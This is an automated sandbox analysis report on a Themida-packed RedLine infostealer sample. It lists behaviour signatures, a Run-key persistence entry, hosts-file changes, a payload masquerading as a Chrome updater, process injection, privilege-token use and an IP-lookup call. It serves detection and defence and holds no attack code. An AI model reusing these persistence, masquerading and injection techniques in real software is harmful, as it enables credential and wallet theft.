Malware Analysis Report

2025-01-18 07:59

Sample ID 230812-kd64jach7z
Target 246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469
SHA256 246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469

Threat Level: Known bad

The file 246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469 was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

Downloads MZ/PE file

Stops running service(s)

Drops file in Drivers directory

Reads user/profile data of web browsers

Executes dropped EXE

Themida packer

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Program crash

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-12 08:30

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-12 08:30

Reported

2023-08-12 08:32

Platform

win10-20230703-en

Max time kernel

149s

Max time network

156s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1148472871-1113856141-1322182616-1000\Software\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4940 set thread context of 4532 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4028 set thread context of 2952 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 4028 set thread context of 2652 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3812 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3812 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3812 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3812 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3812 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3812 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3812 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 3812 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 3812 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4584 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
